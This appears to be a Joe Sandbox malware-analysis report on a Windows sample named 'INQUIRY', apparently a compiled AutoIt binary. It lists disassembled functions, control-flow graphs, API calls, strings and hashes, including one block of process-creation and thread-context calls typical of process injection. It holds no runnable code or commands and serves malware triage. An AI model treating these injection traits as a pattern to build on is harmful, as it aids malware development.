                                                                                              control_flow_graph 1098 a1407c-a14092 1099 a14098-a140ad call a17a16 1098->1099 1100 a1416f-a14173 1098->1100 1103 a140b3-a140d3 call a17bcc 1099->1103 1104 a4d3c8-a4d3d7 LoadStringW 1099->1104 1107 a4d3e2-a4d3fa call a17b2e call a16fe3 1103->1107 1108 a140d9-a140dd 1103->1108 1104->1107 1116 a140ed-a1416a call a32de0 call a1454e call a32dbc Shell_NotifyIconW call a15904 1107->1116 1120 a4d400-a4d41e call a17cab call a16fe3 call a17cab 1107->1120 1110 a140e3-a140e8 call a17b2e 1108->1110 1111 a14174-a1417d call a18047 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A4D3D7
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • _memset.LIBCMT ref: 00A140FC
                                                                                              • _wcscpy.LIBCMT ref: 00A14150
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                              • String ID: Line:
                                                                                              • API String ID: 3942752672-1585850449
                                                                                              • Opcode ID: 4e771085f8dde2b037ef5e38eaef680a6da844e028a022331d39ce29f60f3b8f
                                                                                              • Instruction ID: 623f3db40a6230f042a308ac85e50aaac738f5630665961cac25b55d76620897
                                                                                              • Opcode Fuzzy Hash: 4e771085f8dde2b037ef5e38eaef680a6da844e028a022331d39ce29f60f3b8f
                                                                                              • Instruction Fuzzy Hash: 3931AF71409704AFD321EBA4DD46FDF77E8AF48310F10491BF586920A1EB74A689CB92
                                                                                              Function 00A3541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1133 a3541d-a35436 1134 a35453 1133->1134 1135 a35438-a3543d 1133->1135 1136 a35455-a3545b 1134->1136 1135->1134 1137 a3543f-a35441 1135->1137 1138 a35443-a35448 call a38b28 1137->1138 1139 a3545c-a35461 1137->1139 1151 a3544e call a38db6 1138->1151 1140 a35463-a3546d 1139->1140 1141 a3546f-a35473 1139->1141 1140->1141 1143 a35493-a354a2 1140->1143 1144 a35483-a35485 1141->1144 1145 a35475-a35480 call a32de0 1141->1145 1149 a354a4-a354a7 1143->1149 1150 a354a9 1143->1150 1144->1138 1148 a35487-a35491 1144->1148 1145->1144 1148->1138 1148->1143 1153 a354ae-a354b3 1149->1153 1150->1153 1151->1134 1155 a354b9-a354c0 1153->1155 1156 a3559c-a3559f 1153->1156 1157 a354c2-a354ca 1155->1157 1158 a35501-a35503 1155->1158 1156->1136 1157->1158 1161 a354cc 1157->1161 1159 a35505-a35507 1158->1159 1160 a3556d-a3556e call a40ba7 1158->1160 1164 a3552b-a35536 1159->1164 1165 a35509-a35511 1159->1165 1172 a35573-a35577 1160->1172 1162 a354d2-a354d4 1161->1162 1163 a355ca 1161->1163 1167 a354d6-a354d8 1162->1167 1168 a354db-a354e0 1162->1168 1169 a355ce-a355d7 1163->1169 1173 a3553a-a3553d 1164->1173 1174 a35538 1164->1174 1170 a35513-a3551f 1165->1170 1171 a35521-a35525 1165->1171 1167->1168 1175 a354e6-a354ff call a40cc8 1168->1175 1176 a355a4-a355a8 1168->1176 1169->1136 1177 a35527-a35529 1170->1177 1171->1177 1172->1169 1178 a35579-a3557e 1172->1178 1173->1176 1179 a3553f-a3554b call a346e6 call a40e5b 1173->1179 1174->1173 1193 a35562-a3556b 1175->1193 1183 a355ba-a355c5 call a38b28 1176->1183 1184 a355aa-a355b7 call a32de0 1176->1184 1177->1173 1178->1176 1182 a35580-a35591 1178->1182 1194 a35550-a35555 1179->1194 1189 a35594-a35596 1182->1189 1183->1151 1184->1183 1189->1155 1189->1156 1193->1189 1195 a3555b-a3555e 1194->1195 1196 a355dc-a355e0 1194->1196 1195->1163 1197 a35560 1195->1197 1196->1169 1197->1193
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1559183368-0
                                                                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                              • Instruction ID: 2257151759b53c8ce68a12d5ba3591060184354b31dd55c60a7d19a8292f0d8a
                                                                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                              • Instruction Fuzzy Hash: B451A270E00B05DBDB288FBDD98166EB7B7AF41321F248729F825962D0D771ED909B40
                                                                                              Function 00A1686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F
                                                                                              • _free.LIBCMT ref: 00A4E263
                                                                                              • _free.LIBCMT ref: 00A4E2AA
                                                                                                • Part of subcall function 00A16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                              • API String ID: 2861923089-1757145024
                                                                                              • Opcode ID: ba6aa0cf9ff2c15a59f52dbb40530682c33e9aa6ad9ccb9d429d4f90da166dd3
                                                                                              • Instruction ID: d982926d2dfeef3a269722650dba1d0e7ca7c44c6f2575a3045302abf9488c70
                                                                                              • Opcode Fuzzy Hash: ba6aa0cf9ff2c15a59f52dbb40530682c33e9aa6ad9ccb9d429d4f90da166dd3
                                                                                              • Instruction Fuzzy Hash: 8B918D75A00219EFCF04EFA4DD919EDB7B8FF58310F14852AF816AB2A1DB70A945CB50
                                                                                              Function 00A135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A135A1,SwapMouseButtons,00000004,?), ref: 00A135D4
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A135F5
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A13617
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
                                                                                              • Instruction ID: 35eb89f472438c99f2c22e519120358cddf28210af1b0ad43578865ad380d720
                                                                                              • Opcode Fuzzy Hash: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
                                                                                              • Instruction Fuzzy Hash: 33114872610208BFDF20CFA4DC809EFB7BCEF44740F00846AE805D7210E6719E959760
                                                                                              Function 01DA12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01DA1ACD
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01DA1AF1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01DA1B13
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01DA1E1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
                                                                                              • Instruction ID: e2248e05b0545ec68713e66c7833255ba4e58d42fd12bf2ae3da7c4b5349ba8a
                                                                                              • Opcode Fuzzy Hash: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
                                                                                              • Instruction Fuzzy Hash: 14620B30A14258DBEB24DFA4C850BDEB772EF58300F5091A9D20DEB3A4E7759E81CB59
                                                                                              Function 00A7955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837
                                                                                              • _free.LIBCMT ref: 00A796A2
                                                                                              • _free.LIBCMT ref: 00A796A9
                                                                                              • _free.LIBCMT ref: 00A79714
                                                                                                • Part of subcall function 00A32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00A39A24), ref: 00A32D69
                                                                                                • Part of subcall function 00A32D55: GetLastError.KERNEL32(00000000,?,00A39A24), ref: 00A32D7B
                                                                                              • _free.LIBCMT ref: 00A7971C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                              • String ID:
                                                                                              • API String ID: 1552873950-0
                                                                                              • Opcode ID: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                              • Instruction ID: e97c04e5ed2953790662e8d0fe52fbfc4a746f94e2054b1a3ecbbab49a4896bf
                                                                                              • Opcode Fuzzy Hash: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
                                                                                              • Instruction Fuzzy Hash: 93514DB5D04258AFDF249F64CC85A9EBBB9EF48300F10449EF60DA7241DB715A81CF58
                                                                                              Function 00A3470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                              • Instruction ID: d47a6f89a3114f5b9205431722e68f01bdc4b9908b9e3863208ab738da1c4c0e
                                                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                              • Instruction Fuzzy Hash: 0141C375A007469BDB28CF69D9819AE7BB5EF4A360F24817DF815C7640DB70FD418B40
                                                                                              Function 00A17285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A4EA39
                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00A4EA83
                                                                                                • Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770
                                                                                                • Part of subcall function 00A30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                              • String ID: X
                                                                                              • API String ID: 3777226403-3081909835
                                                                                              • Opcode ID: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
                                                                                              • Instruction ID: 6604a32cadceb364ad848d8d45f3adf153b7291aea2962b1b3de6f0dd19014ae
                                                                                              • Opcode Fuzzy Hash: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
                                                                                              • Instruction Fuzzy Hash: CE21A271A042589BDF41DFD8D845BEE7BF8AF49714F00405AF409EB241DFB859898FA1
                                                                                              Function 00A78D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: 51c5f66368a78ce6c53547d7437c2b16b894b7ef75d496922e01182d1fff2b92
                                                                                              • Instruction ID: f488c76ecd9095c43e2e08ed8aa363f5c788c196cbe9adbe986dc125c99632e3
                                                                                              • Opcode Fuzzy Hash: 51c5f66368a78ce6c53547d7437c2b16b894b7ef75d496922e01182d1fff2b92
                                                                                              • Instruction Fuzzy Hash: 5101DD72D442187EDB28CBA8CC56EFE7BF8DB15311F00459FF556D2181E979E6048760
                                                                                              Function 00A798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00A798F8
                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A7990F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$FileNamePath
                                                                                              • String ID: aut
                                                                                              • API String ID: 3285503233-3010740371
                                                                                              • Opcode ID: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
                                                                                              • Instruction ID: e12c9b1b294fdc40ea198d9ede601eb01f5471ba61a5b6bc9a5ff72d67e22bc6
                                                                                              • Opcode Fuzzy Hash: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
                                                                                              • Instruction Fuzzy Hash: 9FD0177964030DABDB50DBA49C0AFDA772CA704700F0006A2BA54D10A1EEB095998B91
                                                                                              Function 00A8CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
                                                                                              • Instruction ID: 592a05aa0a61434a344efe9acdde37bc6df69f70638f419d2b28b9394c30ec91
                                                                                              • Opcode Fuzzy Hash: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
                                                                                              • Instruction Fuzzy Hash: D1F149716083019FCB14EF28C584A6ABBE5FF89324F14892EF9999B351D730E945CF92
                                                                                              Function 00A1F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
                                                                                                • Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1
                                                                                                • Part of subcall function 00A260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A1F930), ref: 00A26154
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A1F9CD
                                                                                              • OleInitialize.OLE32(00000000), ref: 00A1FA4A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A545C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1986988660-0
                                                                                              • Opcode ID: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
                                                                                              • Instruction ID: 182561036b1f43ee8dbaead0a4f98eac0d2700ce76d561d6b0fd0b587cc0adcb
                                                                                              • Opcode Fuzzy Hash: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
                                                                                              • Instruction Fuzzy Hash: E5819EF0D02A408FC384DFB9EA54A597BE6FB59306760852BD01BCB361E7744486CF12
                                                                                              Function 00A1434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A14370
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A14432
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1505330794-0
                                                                                              • Opcode ID: e05092cd2d31424f2295cb0b177fff798494df7b906de84bd0f085a7a133b5a8
                                                                                              • Instruction ID: a5ac438a369ad5a27669672df7bd8d6185af14ded3de2b694bcbb2c6ace0f238
                                                                                              • Opcode Fuzzy Hash: e05092cd2d31424f2295cb0b177fff798494df7b906de84bd0f085a7a133b5a8
                                                                                              • Instruction Fuzzy Hash: C0318EB09057018FD721DF78D8846DBBBF8FB49309F00092EE59A86251E770A989CB52
                                                                                              Function 00A3571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00A35733
                                                                                                • Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A192
                                                                                                • Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A19C
                                                                                              • __NMSG_WRITE.LIBCMT ref: 00A3573A
                                                                                                • Part of subcall function 00A3A1C8: GetModuleFileNameW.KERNEL32(00000000,00AD33BA,00000104,?,00000001,00000000), ref: 00A3A25A
                                                                                                • Part of subcall function 00A3A1C8: ___crtMessageBoxW.LIBCMT ref: 00A3A308
                                                                                                • Part of subcall function 00A3309F: ___crtCorExitProcess.LIBCMT ref: 00A330A5
                                                                                                • Part of subcall function 00A3309F: ExitProcess.KERNEL32 ref: 00A330AE
                                                                                                • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
                                                                                              • RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
